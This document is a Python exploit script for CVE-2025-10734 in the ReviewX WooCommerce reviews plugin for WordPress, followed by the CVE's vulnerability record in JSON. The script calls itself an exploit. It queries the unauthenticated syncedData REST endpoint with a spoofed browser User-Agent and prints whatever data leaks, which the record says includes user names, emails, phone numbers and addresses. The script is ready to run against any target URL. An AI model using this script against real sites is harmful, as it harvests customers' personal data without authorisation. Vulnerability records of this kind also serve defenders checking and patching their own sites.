CVE-2025-10734

import requests import json def check_vulnerability(target_url): """ Exploit for CVE-2025-10734 (Sensitive Information Exposure) This script attempts to fetch sensitive data from the syncedData endpoint. """ # The endpoint path might vary based on plugin configuration, typically under wp-json endpoint = "/wp-json/reviewx/v1/syncedData" full_url = f"{target_url.rstrip('/')}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Target is vulnerable: {full_url}") print("[+] Leaked Data:") try: data = response.json() print(json.dumps(data, indent=2)) except json.JSONDecodeError: print(response.text) else: print(f"[-] Target appears not vulnerable or endpoint changed. Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with the actual target URL check_vulnerability(target)

{"cve": {"id": "CVE-2025-10734", "sourceIdentifier": "[email protected]", "published": "2026-03-23T06:16:18.307", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.12 via the syncedData function. This makes it possible for unauthenticated attackers to extract sensitive data including user names, emails, phone numbers, addresses."}, {"lang": "es", "value": "El plugin ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 2.2.12, inclusive, a través de la función syncedData. Esto permite que atacantes no autenticados extraigan datos sensibles, incluyendo nombres de usuario, correos electrónicos, números de teléfono, direcciones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-922"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/reviewx/tags/2.2.7/app/Rest/Controllers/DataSyncController.php#L77", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eb830ad3-50ba-4dfe-becb-351b227706c1?source=cve", "source": "[email protected]"}]}}